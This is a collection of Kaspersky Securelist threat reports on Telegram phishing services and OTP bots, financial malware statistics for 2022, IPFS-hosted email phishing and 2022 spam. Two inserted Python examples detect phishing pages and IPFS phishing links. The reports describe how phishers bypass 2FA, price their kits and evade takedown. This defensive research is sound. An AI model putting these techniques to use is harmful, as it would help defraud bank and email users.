Our chat with the vendor about OTP bot pricing

Another OTP bot is offered on a pay-per-minute, prepaid basis. Rates start at $0.15 per minute depending on the destination. The bot can record calls and store settings, such as the victim’s phone number, name and so on.

OTP bot interface: the victim's name and phone number, service name and language are required for setting up a call

A customer who shares this information with the bot creators, along with a screenshot showing the victim’s account number, balance and other details, may be rewarded with a small amount added to their OTP bot balance: $5 for two units of information and $10 for three or more.

Some PhaaS vendors take their customers’ trust seriously. In the screenshot below, you can see assurances that all data obtained with paid tools is reliably encrypted, so that neither the vendor nor any third parties can read it. All these vendors want is for their customers to remain loyal.

PhaaS vendor explaining to customers that all their data is reliably encrypted

Detection and statistics

Although the phishers who offer their services on Telegram use many techniques to avoid blocking, our systems detect their fake sites with high precision and add them to our databases.

Malicious sites generated by phishing bots are either hosted in the same domain, or share parts of HTML code, or both. This makes it easy for our cyberthreat detection technology to discover them.
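One way to exploit the two overlaps just described, a shared hosting domain and shared HTML, as an added example that is not the article's detection technology: each page is keyed by a tag-skeleton hash (text, ids and classes stripped; tag order and form field names kept) and by its registrable domain, and pages linked by either key are merged into one cluster. The sample pages, hostnames and the crude eTLD+1 helper are constructed assumptions.

```python
"""Added example (not Kaspersky's detector): cluster candidate phishing pages
that share a domain or an HTML template.

Assumptions: pages and URLs below are constructed; registrable_domain() is a
deliberately crude last-two-labels stand-in for a Public Suffix List lookup."""
import hashlib
from collections import defaultdict
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit


class _Skeleton(HTMLParser):
    """Collects 'tag' / 'tag[name=...,type=...]' tokens in document order."""
    KEEP_ATTRS = {"name", "type"}  # form field names survive; ids/classes/text do not

    def __init__(self) -> None:
        super().__init__()
        self.tokens: List[str] = []

    def handle_starttag(self, tag, attrs):
        kept = sorted(f"{k}={v}" for k, v in attrs if k in self.KEEP_ATTRS and v)
        self.tokens.append(tag + ("[" + ",".join(kept) + "]" if kept else ""))

    def handle_endtag(self, tag):
        self.tokens.append("/" + tag)


def skeleton_hash(html: str) -> str:
    """Hash of the tag structure only, so a re-skinned template still matches."""
    p = _Skeleton()
    p.feed(html)
    return hashlib.sha256(" ".join(p.tokens).encode()).hexdigest()[:16]


def registrable_domain(url: str) -> str:
    """Crude eTLD+1 (last two labels); a real pipeline would use the PSL."""
    host = urlsplit(url).hostname or ""
    return ".".join(host.split(".")[-2:])


def cluster_pages(pages: Dict[str, str]) -> List[List[str]]:
    """Union-find over two link types: same domain, or same skeleton hash.
    Returns clusters (each sorted), largest first."""
    parent = {u: u for u in pages}

    def find(u: str) -> str:
        while parent[u] != u:
            parent[u] = parent[parent[u]]
            u = parent[u]
        return u

    by_key = defaultdict(list)
    for url, html in pages.items():
        by_key[("domain", registrable_domain(url))].append(url)
        by_key[("skeleton", skeleton_hash(html))].append(url)
    for members in by_key.values():
        for other in members[1:]:
            parent[find(other)] = find(members[0])

    clusters = defaultdict(list)
    for url in pages:
        clusters[find(url)].append(url)
    groups = [sorted(m) for m in clusters.values()]
    return sorted(groups, key=lambda g: (-len(g), g))


# Constructed pages: A and C share a template, A and B share a domain, D is unrelated.
URL_A = "http://kit-host.invalid/tiktok/login"
URL_B = "http://kit-host.invalid/paypal/signin"
URL_C = "http://other-host.invalid/account/verify"
URL_D = "https://unrelated.invalid/about"
PAGES = {
    URL_A: '<html><body><div class="tt-1"><h2>Log in to TikTok</h2><form method="post">'
           '<input type="text" name="email"><input type="password" name="password">'
           '<button type="submit">Log in</button></form></div></body></html>',
    URL_C: '<html><body><div class="x9"><h2>Verify your account</h2><form method="post" id="f">'
           '<input type="text" name="email"><input type="password" name="password">'
           '<button type="submit">Continue</button></form></div></body></html>',
    URL_B: '<html><body><h1>PayPal</h1><form method="post"><input type="email" name="login_email">'
           '<input type="password" name="login_password"><input type="submit"></form></body></html>',
    URL_D: '<html><body><p>About us</p></body></html>',
}

if __name__ == "__main__":
    for group in cluster_pages(PAGES):
        print(len(group), group)
```

Keeping `name` attributes in the skeleton is what makes the grouping useful for phishing specifically: kit authors restyle pages freely but rarely rename the fields their collection script reads.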

In the above example of a bot generating phishing pages the same domain was used to host fake websites that mimicked those of various legitimate organizations. We have detected a total of 1483 attempts to access pages located in that domain since it emerged.

Kaspersky anti-phishing detection statistics for a domain linked to a phishing bot, December 2022 through March 2023

Since many off-the-shelf phishing solutions offered on Telegram are basic or complex phishing kits, here are some relevant detection statistics on those. In the last six months, our technology has detected 2.5 million malicious URLs generated with phishing kits.

Number of detected malicious URLs generated with phishing kits, October 2022 through March 2023 (download)

We prevented 7.1 million attempts by users to access these malicious sites within the same period.

Kaspersky anti-phishing detection statistics for pages generated with phishing kits, October 2022 through March 2023 (download)

Takeaways

Wannabe phishers used to need to find a way onto the dark web, study the forums there and do other things to get started. The threshold to joining the phisher community lowered once malicious actors migrated to Telegram and now share insights and knowledge, often for free, right there in the popular messaging service.

Even the laziest and most cash-strapped can use Telegram bots offered by channel owners to generate phishing pages and obtain data stolen from their victims. Some attackers upload archives with data for anyone to make use of. An aspiring phisher who wishes to generate a greater variety of content can download phishing kits that target a wide range of organizations.

Scammers use an array of free offers to promote paid services. They are also likely manipulating newcomers into using their free phishing kits and bots, which can potentially share stolen data with their creators.

The more solvent audience is offered paid phishing pages with geoblocking functionality and regularly updated anti-bot systems, which are harder to detect than those generated with basic phishing kits and bots. Prices range from $10 to $300 and depend on the feature set. Phishers also sell stolen online banking credentials and offer OTP bot subscriptions that can be used to bypass 2FA.

A detailed review of available offers on Telegram phishing channels suggests that the bulk of these consists of phishing kits, which our technology successfully blocks: over the last six months, we have detected 2.5 million pages generated with phishing kits.

Financial cyberthreats in 2022 (https://securelist.com/financial-cyberthreats-in-2022/109219/, Wed, 29 Mar 2023 10:00:02 +0000)

Financial gain remains the key driver of cybercriminal activity. In the past year, we’ve seen multiple developments in this area – from new attack schemes targeting contactless payments to multiple ransomware groups continuing to emerge and haunt businesses. However, traditional financial threats – such as banking malware and financial phishing – continue to take up a significant share of such financially motivated cyberattacks.

In 2022, we saw a major upgrade of the notorious Emotet botnet as well as the launch of massive campaigns by Emotet operators throughout the year. For instance, malicious spam campaigns targeting organizations grew 10-fold in April 2022, spreading Qbot and Emotet malware. We also witnessed the emergence of new banking Trojans that hunt for banking credentials, and greater activity on the part of some well-known ones, such as Dtrack, Zbot and Qbot.

The good news is that regardless of these continuous advancements, we’ve witnessed a steady decrease in the number of attacks by banking Trojans. Security solutions integrated into operating systems, two-factor authentication and other verification measures have helped reduce the number of vulnerable users. Additionally, in many markets mobile banking has been pushing out online banking, with more and more convenient and secure banking apps emerging.

Meanwhile, cryptocurrency became a prominent target for those seeking monetary gain. The amount of cryptocurrency-related phishing grew significantly in 2022, and with an endless array of new coins, NFT and other DeFi projects, scammers are continuously duping users. Funds lost via cryptocurrency are hard to track and impossible to return with the help of a regulatory body, as is done with banks and fiat currency, so this trend is likely to continue gaining traction.

Some advanced persistent threat (APT) actors also started tapping into the cryptocurrency market. We previously reported on the Lazarus group, which developed VHD ransomware for the purpose of monetary gain. Now we see that APT actors have also switched to crypto. BlueNoroff developed an elaborate phishing campaign that targeted startups and distributed malware for stealing all crypto in the account tied to the device. They impersonated numerous venture capital groups and investors with considerable success. The NaiveCopy campaign, another example of an advanced threat, targeted stock and cryptocurrency investors in South Korea. And there is more room for further development – hardware wallets and smart contracts could provide a new juicy target for attackers.

This report shines a spotlight on the financial cyberthreat landscape in 2022. It presents a continuation of our previous annual financial threat reports (2018, 2019, 2020, 2021), which provide an overview of the latest trends across the threat landscape. We look at phishing threats commonly encountered by users and companies, as well as the dynamics of various Windows and Android-based financial malware.

Methodology

For this report, we conducted a comprehensive analysis of financial cyberthreats in 2022. We focused on malicious software that targets financial services institutions such as online banking, payment systems, e-money services, online stores, and cryptocurrency services. This category of financial malware also includes those seeking unauthorized access to financial organizations’ IT infrastructures.

In addition to financial malware, we also examined phishing activities. This entailed studying the design and distribution of financially themed web pages and emails that impersonate well-known legitimate sites and organizations with the intention of deceiving potential victims into disclosing their private information.

To gain insights into the financial threat landscape, we analyzed data on malicious activities on the devices of Kaspersky security product users. Individuals who use these products voluntarily made their data available to us through Kaspersky Security Network. All data collected from Kaspersky Security Network was anonymized.

We compared the data from 2022 to that of 2021 to identify year-on-year trends in malware development. However, we also included occasional references to earlier years to provide further insights into the evolutionary trends in financial malware.

Key findings

Phishing

  • Financial phishing accounted for 36.3% of all phishing attacks in 2022.
  • E-shop brands were the most popular lure, accounting for 15.56% of attempts to visit phishing sites.
  • PayPal was the almost exclusive focus of phishers in the electronic payment systems category, with 84% of phishing pages targeting the platform.
  • Cryptocurrency phishing saw 40% year-on-year growth in 2022, with 5,040,520 detections compared to 3,596,437 in 2021.

PC malware

  • The number of users affected by financial malware continued to decline in 2022, dropping by 14% from 2021.
  • Ramnit and Zbot were the most prevalent malware families, targeting over 50% of affected users.
  • Consumers remained the primary target of financial cyberthreats, accounting for 61.8% of attacks.

Mobile malware

  • The number of Android users attacked with banking malware decreased by around 55% in 2022 compared to the previous year.
  • Bian surpassed Agent as the most active mobile malware family in 2022, with 22% of attacks compared to Agent’s 20%.
  • The geographical distribution of affected users by Android banking malware in 2022 shows that Spain had the highest percentage of targeted users with 1.96%, followed by Saudi Arabia with 1.11% and Australia with 1.09%.

Financial phishing

Phishing continues to be one of the most widespread forms of cybercrime thanks to the low entry threshold and its effectiveness. As we covered previously, cybercriminals can launch phishing campaigns with minimal effort by purchasing ready-made phishing kits.

Phishing is typically built around a classic scheme: first create a website, then craft emails or notifications that mimic real organizations and prompt users to follow a link to the site, share their personal or payment information, or download malware disguised as a legitimate program. Phishers mimic every type of organization, including banks, government services, retail and entertainment, as long as the service has a strong user base.

Financial services in particular are of high interest to phishers due to the direct connection to money and payment data. In 2022, 36.3% of all phishing attacks detected by Kaspersky anti-phishing technologies were related to financial phishing.

Distribution of financial phishing cases by type, 2022 (download)

In this report, financial phishing covers not only bank-specific phishing but also phishing that targets e-shops and payment systems.

Payment-system phishing refers to phishing pages that mimic well-known payment brands, such as PayPal, MasterCard, Visa, and American Express. E-shops mean online stores and auction sites such as Amazon, Aliexpress, the App Store, and eBay.

In 2022, e-shop brands were the most popular type of lure used by phishers. 15.56% of attempts to visit phishing sites blocked by Kaspersky in 2022 were related to e-shops. If we look at the distribution within financial phishing, e-shops account for 42% of financial phishing cases. E-shops were followed by payment systems (10.39%) and banks (10.39%). Online shopping continues to grow worldwide and, accordingly, the number of brands that are being mimicked by phishers grows with novel schemes appearing on a regular basis.

E-shop brands most frequently exploited in financial phishing schemes, 2022 (download)

In 2022, Apple remained the brand most exploited by scammers, with almost 60% of attacks. The allure of winning the latest model of a new device has proved irresistible to many users, especially during the current global crisis with increasing prices. Not only did we see a spike in these types of scams during major Apple events, but scammers also frequently used Apple to lure victims by offering, for instance, newly released iPhones as prizes for predicting match outcomes during major events like the FIFA World Cup. Meanwhile, Amazon remained in second place with 14.81% of attacks.

In the realm of electronic payment systems, PayPal has traditionally been a popular target for exploitation by scammers. However, recent data indicates that this year it is not only the primary but the near exclusive focus of phishers, with a staggering 84.23% of phishing pages for electronic payment systems targeting PayPal. As a result, the shares of other payment systems have plummeted, with MasterCard International down to 3.75%, Visa Inc. down to 3.10%, and American Express down to 2.02% in 2022.

Payment system brands most frequently exploited in financial phishing schemes, 2022  (download)

Example of a phishing page mimicking the PayPal login page


Cryptophishing

In 2022, cryptocurrency phishing rose sufficiently to be included as a separate category. While the total number of attempts to visit such sites makes up just a fraction (0.87%) of all phishing, this category of phishing demonstrated 40% year-on-year growth with 5,040,520 detections in 2022 compared to 3,596,437 in 2021. This boom in cryptophishing may be partially explained by the cryptomarket havoc we saw last year. That said, it is so far unclear whether the trend will continue, and this will significantly depend on the trust users put in cryptocurrency.

Example of a phishing page offering crypto


Cryptoscams exploit the topic of cryptocurrency to deceive people and steal their money, often through promises of high returns on investments. Common types include Ponzi schemes, ICO scams, phishing scams, and fake wallet scams.

Example of a phishing page asking for crypto details


Banking malware

This section analyzes banking malware used for stealing login credentials for online banking or payment systems, as well as capturing one-time passwords for two-factor authentication.

Our analysis of financial cyberthreats in 2022 revealed that the number of users affected by financial malware continued to decline. The figures showed a decrease from 405,985 in 2021 to 350,808 in 2022, marking a 14% drop. This decline followed the trend observed over the previous years, with a 35% drop in 2021, a 20% decline in 2020, and a near 13% decrease in 2019. Financial PC malware is on the wane due to the challenges and costs associated with maintaining and developing a botnet capable of successfully attacking users. To execute a successful attack, the Trojan must wait until the user manually logs in to their bank’s website, which has become more infrequent with the growth in popularity of mobile banking apps. Furthermore, the latest versions of operating systems come with built-in security systems, and prolonged presence in the system raises the probability of malware detection. This might also indicate a pivot toward advanced targeted attacks as cybercriminals start to prioritize large business targets.

Additionally, cybercriminals are adapting their tactics to exploit the shift toward mobile banking. As users increasingly switch to phone banking, attackers are developing new techniques to compromise mobile devices and steal sensitive information.

Dynamic change in the number of unique users attacked by banking malware in 2021 – 2022  (download)

Main actors among banking malware

Our 2022 analysis of financial cyberthreats revealed the presence of several families of banking malware with varying lifecycles. Ramnit emerged as the most prevalent malware family with a share of 34.4%, followed by Zbot with 16.2%. Interestingly, the analysis highlights that over 50% of affected users were targeted only by these two families. Ramnit activity increased substantially compared to the previous year, when its slice was only 3.4%. This malware worm spreads through spam emails with links to infected websites, and steals financial information. Emotet, previously named by Europol the world’s most dangerous malware, made a return to the Top 3 most active malware families after law enforcement shut it down in January 2021.

The lifecycle of Emotet vividly demonstrates how malware families continue to evolve and expand their capabilities to infiltrate and compromise financial systems.

Top 10 PC banking malware families

Name                 Verdicts                              %*
Ramnit/Nimnul        Trojan-Banker.Win32.Ramnit            34.4
Zbot/Zeus            Trojan-Banker.Win32.Zbot              16.2
Emotet               Trojan-Banker.Win32.Emotet             6.4
CliptoShuffler       Trojan-Banker.Win32.CliptoShuffler     6.2
IcedID               Trojan-Banker.Win32.IcedID             4.1
Trickster/Trickbot   Trojan-Banker.Win32.Trickster          4.0
SpyEye               Trojan-Spy.Win32.SpyEye                3.4
RTM                  Trojan-Banker.Win32.RTM                2.5
Gozi                 Trojan-Banker.Win32.Gozi               2.4
BitStealer           Trojan-Banker.MSIL.BitStealer          1.6

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Geography of attacked users

In this year’s report, we calculated the percentage of Kaspersky users in each country that encountered a financial cyberthreat relative to all users that were attacked by financial malware. This approach helps us identify the countries with the highest risk of computer infection due to financial malware.

The 2022 report shows the distribution of financial malware attacks across different countries. The Top 20 countries in the list below account for more than half of all infection attempts.

Top 20 countries and territories by share of attacked users

Country or territory* %**
Turkmenistan 6.6
Afghanistan 6.5
Tajikistan 4.9
China 3.3
Uzbekistan 3.3
Yemen 3.3
Sudan 2.9
Mauritania 2.8
Egypt 2.5
Azerbaijan 2.5
Venezuela 2.5
Paraguay 2.5
Switzerland 2.4
Syria 2.4
Libya 2.3
Algeria 2.2
Iraq 2.0
Indonesia 1.9
Bangladesh 1.8
Pakistan 1.8

* Excluded are countries and territories with relatively few Kaspersky users (under 10,000).
** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country.

The data shows that Turkmenistan has the highest share of attacked users with 6.6%, followed by Afghanistan and Tajikistan with 6.5% and 4.9% respectively.

Types of users attacked

The 2022 numbers show that the distribution of financial cyberthreats remained relatively stable, with consumers (61.8%) still being the primary target and corporate users (38.2%) accounting for a smaller percentage of attacks. The change from 2021 is relatively small, at less than 1%, and does not represent a significant shift in the overall distribution of attacks.

Malware attack distribution by type (corporate vs consumer), 2021 – 2022 (download)

This can be attributed to the fact that the world has become accustomed to the new style of post-pandemic work, with many companies continuing to operate in remote or hybrid work modes. The trend of working from home or remotely is no longer new, and many companies have adapted to it. As a result, they have also learned how to deal with potential threats and have implemented measures to ensure the security of their employees’ devices and data. Now employees are likely using similar devices and security measures for personal and work purposes, making it harder for cybercriminals to differentiate between consumer and corporate targets.

Mobile banking malware

We have been observing a steady and steep downward trend in the number of Android users affected by banking malware for at least four years now. In 2022, the number of Android users attacked with banking malware was 57,219, a more than 2.5-fold decrease from the figure reported in the previous year, representing a drop of around 55%.

This trend marked a continuation from previous years, with the number of Android users attacked dropping by 55% in 2020 and by almost 50% in 2021, resulting in a total of 147,316 users affected in 2021.

Number of Android users attacked by banking malware by month, 2020 – 2022 (download)

Despite the steady decline in the number of Android users affected by banking malware, it is important for users not to become complacent, as cybercriminals continue to evolve their malware and find new ways to carry out attacks. In 2022, we identified over 200,000 new banking Trojan installers, which is twice the number reported in the previous year.

Comparing the most active mobile malware families of 2021 to those of 2022, we see some significant changes. In 2021, Agent was the most prevalent mobile malware, representing 26.9% of attacks. However, in 2022, Bian surpassed Agent as the most active mobile malware family, with 24.25% of attacks compared to Agent’s 21.57%.

As for the other malware families on the list, Anubis (11.24%) and Faketoken (10.53%) maintained their positions in the Top 5, respectively. Asacub also remained in the Top 5 list, with almost 10% of attacks, but dropped to fifth place from its third-place ranking in 2021.

Top 10 Android banking malware families

Name        Verdicts                             %*
Bian        Trojan-Banker.AndroidOS.Bian         24.25
Agent       Trojan-Banker.AndroidOS.Agent        21.57
Anubis      Trojan-Banker.AndroidOS.Anubis       11.24
Faketoken   Trojan-Banker.AndroidOS.Faketoken    10.53
Asacub      Trojan-Banker.AndroidOS.Asacub        9.91
Svpeng      Trojan-Banker.AndroidOS.Svpeng        6.08
Cebruser    Trojan-Banker.AndroidOS.Cebruser      5.23
Gustuff     Trojan-Banker.AndroidOS.Gustuff       3.13
Bray        Trojan-Banker.AndroidOS.Bray          2.27
Sova        Trojan-Banker.AndroidOS.Sova          2.14

* Unique users who encountered this malware family as a percentage of all users attacked by financial malware.

Svpeng, which was the third most prevalent malware family in 2021, with 21.4% of attacks, dropped to sixth place in 2022, with 6.08% of attacks. Meanwhile, Cebruser, Gustuff, Bray, and Sova entered the list.

Geography of attacked users

The geographical distribution of users affected by Android banking malware in 2021 and 2022 shows some differences between the two Top 10 lists of countries and territories. In the 2021 list, Japan had the highest percentage of targeted users with 2.18%, followed by Spain with 1.55%, while in the 2022 list, Spain had the highest percentage with 1.96%, followed by Saudi Arabia with 1.11%.

Australia appeared in both lists, with a 0.48% share in the first list and a 1.09% share in the second. Turkey also appeared in both lists, with a 0.71% share in the first list and a 0.99% share in the second. Italy had a 0.29% share in the first list and a 0.17% share in the second list, while Japan had a 0.30% share in the second list.

Top 10 countries and territories, 2021

Country or territory* %**
Japan 2.18
Spain 1.55
Turkey 0.71
France 0.57
Australia 0.48
Germany 0.46
Norway 0.31
Italy 0.29
Croatia 0.28
Austria 0.28

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Top 10 countries and territories, 2022

Country or territory* %**
Spain 1.96
Saudi Arabia 1.11
Australia 1.09
Turkey 0.99
Switzerland 0.48
Japan 0.30
Colombia 0.19
Italy 0.17
India 0.16
South Korea 0.16

* Countries and territories with relatively few users of Kaspersky mobile security solutions (under 25,000) have been excluded from the rankings.
** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security solution users in the country.

Overall, the two lists show that banking malware continues to be a global threat, affecting users in different countries and regions.

Conclusion

Year 2022 demonstrated that banking malware attacks continue to decline, both for PC and mobile malware. Still, the number of such attacks remains significant and users, as always, need to stay vigilant. At the same time, cybercriminals are switching their focus to cryptocurrency, as these attacks are harder to track. With new payment systems emerging, we are sure to see new attacks in the future and, potentially, yet more targeting of cryptocurrency.

Additionally, financial phishing schemes remain a top category in all phishing, with fraudsters continuing to hunt for banking and other sensitive data, exploiting trusted brands. This activity isn’t likely to die down, and we will continue to witness new schemes emerge on a regular basis.

For protection against financial threats, Kaspersky recommends the following:

  • Install only applications obtained from reliable sources
  • Refrain from approving rights or permissions requested by applications without first ensuring they match the application’s feature set
  • Never open links or documents included in unexpected or suspicious-looking messages
  • Use a reliable security solution, such as Kaspersky Premium, that protects you and your digital infrastructure from a wide range of financial cyberthreats

To protect your business from financial malware, Kaspersky security experts recommend:

  • Providing cybersecurity awareness training, especially for employees responsible for accounting, that includes instructions on how to detect phishing pages
  • Improving the digital literacy of staff
  • Enabling a Default Deny policy for critical user profiles, particularly those in financial departments, which ensures that only legitimate web resources can be accessed
  • Installing the latest updates and patches for all software used
How scammers employ IPFS for email phishing (https://securelist.com/ipfs-phishing/109158/, Mon, 27 Mar 2023 08:00:48 +0000)

The idea of creating Web 3.0 has been around since the end of the 2000s. The new version of the world wide web should repair the weak points of Web 2.0, some of which are: featureless content, prevalence of proprietary solutions, and lack of safety in a centralized user data storage environment, where a massive leak is likely should just one server be compromised. Web 3.0 is described as a decentralized and open internet — some of its features are already implemented in today’s digital world.

Unfortunately, the “new internet” will still remain a playground for criminals who will employ cutting-edge technologies for their old sport of data theft, financial machinations and the like. In this article, I will dwell on how they use one of the Web 3.0 technologies — the distributed file system IPFS — for email phishing attacks.

What is IPFS?

IPFS (InterPlanetary File System) is a peer-to-peer distributed file system enabling users around the world to exchange files. Unlike centralized systems, IPFS addresses content by unique content identifiers (CID), not by file paths. The CID is generated from the file’s hash value and then recorded in a distributed hash table, which also contains information on the file owner. The file itself resides on the computer of the user who “uploaded” it to IPFS, and is downloaded directly from that computer. The structure of IPFS is somewhat similar to the BitTorrent protocol which, too, is a distributed network where file exchange takes place directly between the users’ devices.

By default, uploading a file to IPFS or downloading it requires special software (an IPFS client). So that users can view the files residing in IPFS without installing any software, so-called gateways are provided. A gateway is in fact a server with access to IPFS. To open a file via a gateway, a URL is required, normally containing a gateway address, a reference to IPFS, and the file’s CID. URL formats can be quite different, for example:

  • https://gateway_address/ipfs/CID
  • https://CID.ipfs.gateway_address

Phishing and IPFS

In 2022, scammers began actively using IPFS for email phishing attacks. They would place HTML files containing a phishing form in IPFS and use gateways as proxies, so that victims could open the file whether or not they were running an IPFS client on their devices. The scammers would include gateway links to the file in phishing letters dispatched to would-be victims.

The use of a distributed file system allows attackers to cut back on phishing page hosting costs. Besides, files uploaded by third parties cannot be deleted from IPFS. If somebody wants a file to disappear from the system completely, they can urge its owners to delete it, but that method will probably never work with cybercriminals anyway.

IPFS gateway providers attempt to combat IPFS phishing by regularly deleting links to fraudulent files.

Phishing page deletion notification


Yet detection and deletion of links at gateway level does not always happen as quickly as the blocking of a phishing website, cloud form, or document. We have observed URL addresses of IPFS files that first appeared in October 2022 and remain operational at the time of this writing.

Phishing letters containing IPFS links are hardly ever too original — they contain the typical phishing content the purpose of which is to obtain the victim’s account login and password.

Phishing letter with an IPFS link


It is a bit more interesting to examine the HTML pages the links lead to.

HTML page used for phishing


As can be seen on the screenshot above, the URL parameter contains the recipient’s e-mail address. Once it is modified, the page content will change too: the corporate logo on top of the phishing form and the email address entered into the login field. In this way, one link can be used in several phishing campaigns targeting different users — sometimes even in dozens of campaigns.

Phishing page modification


The logo replacement effect is achieved with a simple piece of JavaScript. The script obtains the domain from the page’s URL parameter and substitutes it into the URL of a Google resource, from which a logo icon is then sourced.

Company logo substitution

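As an added example (not Kaspersky’s code and not the detection logic the article refers to), the following Python helper recognizes both gateway URL formats listed in the “What is IPFS?” section and flags links that carry the recipient’s e-mail address in the query string or fragment, the template trick described for the phishing page above. The gateway hosts, CIDs and addresses are constructed placeholders, and the scoring scheme is an assumption for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# CIDv0: a base58btc-encoded sha2-256 multihash, always 46 characters, "Qm...".
CIDV0_RE = re.compile(r"^Qm[1-9A-HJ-NP-Za-km-z]{44}$")
# CIDv1 in base32 (multibase prefix "b"); the only form usable in subdomain-style
# gateway URLs, because DNS labels are case-insensitive.
CIDV1_B32_RE = re.compile(r"^b[a-z2-7]{58,}$")
EMAIL_RE = re.compile(r"^[^@\s/]+@[^@\s/]+\.[^@\s/]+$")

# Constructed sample links (placeholder gateways, CIDs and addresses).
SAMPLE_CID_V0 = "Qm" + "ABCDEFGH" * 5 + "JKLM"   # 46 chars, valid base58 alphabet
SAMPLE_CID_V1 = "b" + "a" * 58                   # 59 chars, base32 alphabet
SAMPLE_LINKS = [
    # path-style gateway URL, recipient address smuggled in the fragment
    "https://gateway.example/ipfs/" + SAMPLE_CID_V0 + "/index.html#victim@corp.example",
    # subdomain-style gateway URL, recipient address in a query parameter
    "https://" + SAMPLE_CID_V1 + ".ipfs.ipfs-gw.example/?email=victim%40corp.example",
    # plain IPFS link with no per-recipient parameter
    "https://gateway.example/ipfs/" + SAMPLE_CID_V0 + "/",
    # ordinary (non-IPFS) link that also carries an address, for contrast
    "https://mail.example.net/login?email=victim%40corp.example",
]


def is_cid(value):
    """True if value has the shape of a CIDv0 (base58) or base32 CIDv1."""
    return bool(CIDV0_RE.match(value) or CIDV1_B32_RE.match(value))


def extract_ipfs_cid(url):
    """Return (gateway_host, cid) for either gateway URL format, else None.

    Path style:      https://<gateway>/ipfs/<CID>[/...]
    Subdomain style: https://<CID>.ipfs.<gateway>/...
    """
    parsed = urlparse(url)
    host = parsed.hostname or ""          # lowercased; fine, see CIDV1_B32_RE note
    parts = parsed.path.split("/")
    if len(parts) >= 3 and parts[1] == "ipfs" and is_cid(parts[2]):
        return host, parts[2]
    labels = host.split(".")
    if len(labels) >= 3 and labels[1] == "ipfs" and is_cid(labels[0]):
        return ".".join(labels[2:]), labels[0]
    return None


def find_email_params(url):
    """E-mail addresses passed as query values, bare query keys, or the fragment."""
    parsed = urlparse(url)
    found = []
    for key, values in parse_qs(parsed.query, keep_blank_values=True).items():
        key = unquote(key)
        if values in ([], [""]) and EMAIL_RE.match(key):
            found.append(("", key))       # "?victim@corp.example" style
        for value in values:
            value = unquote(value)
            if EMAIL_RE.match(value):
                found.append((key, value))
    fragment = unquote(parsed.fragment)
    if EMAIL_RE.match(fragment):
        found.append(("#", fragment))
    return found


def assess_ipfs_link(url):
    """Triage verdict for one URL taken from an e-mail. Scoring is illustrative."""
    hit = extract_ipfs_cid(url)
    if hit is None:
        return {"ipfs": False, "score": 0, "reasons": [], "emails": []}
    gateway, cid = hit
    reasons = ["ipfs gateway link"]
    score = 1
    emails = [addr for _, addr in find_email_params(url)]
    if emails:
        # A per-recipient address in the URL is the templated-page indicator
        # described in the article: one CID reused across many campaigns.
        reasons.append("recipient address passed as URL parameter")
        score += 2
    return {"ipfs": True, "gateway": gateway, "cid": cid, "score": score,
            "reasons": reasons, "emails": emails}


if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        verdict = assess_ipfs_link(link)
        print(verdict["score"], verdict["reasons"], link)
```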

Use of IPFS in targeted phishing attacks

The use of IPFS is not limited to mass mailing campaigns: it is used for complex targeted attacks too. Unlike the ordinary ones, targeted phishing campaigns are much better prepared, normally focusing on specific persons within the company, not just random users.

Targeted phishing with an IPFS link


In the two examples above, the attacks were leveled at corporate procurement departments, the letters purportedly coming from sales managers of existing organizations. The phishing page itself lacks originality.

Phishing page used in a targeted attack


Statistics

In late 2022, we were observing 2–15 thousand IPFS phishing letters a day most of the time. But there were quieter days too: our systems registered only 637 such letters on December 1, and 937 on December 23. Starting this year, IPFS phishing began to grow in scale. We observed a few upsurges in January and February with over 24,000 letters a day — with peaks reaching 34–37 thousand a day. However, the flurry had died down little by little by mid-February, the number of attacks mostly returning to November and December levels.

Dynamics of the number of IPFS phishing attacks, November 2022 — February 2023 (download)

Yet it is worth noting that February turned out the busiest month in terms of IPFS phishing activity. In that month alone, we observed almost 400,000 letters — more than 20,000 above the January figure, and over 100,000 more than in November and December 2022.

IPFS phishing letters distribution by month, November 2022 — February 2023 (download)

Conclusion

Attackers have used and will continue to use cutting-edge technologies to reap profits. Of late, we have observed an increase in the number of IPFS phishing attacks — both mass and targeted. The distributed file system allows scammers to save money on domain purchases. Plus, it is not easy to completely delete a file, although there are attempts to combat fraud at the IPFS gateway level. The good news is that anti-spam solutions detect and block links to phishing files in IPFS, just like any other phishing links. In particular, Kaspersky products employ a number of heuristics to detect IPFS phishing.

Spam and phishing in 2022 (https://securelist.com/spam-phishing-scam-report-2022/108692/, Thu, 16 Feb 2023 08:00:07 +0000)

Figures of the year

In 2022:

  • 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam
  • As much as 29.82% of all spam emails originated in Russia
  • Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments
  • Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links
  • 378,496 attempts to follow phishing links were associated with Telegram account hijacking

Phishing in 2022

Last year’s resonant global events

The year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the “preview”, the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.

Some websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users the chance to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.

Soccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. Those who chose to spend their money on a shady website risked never getting what they ordered.

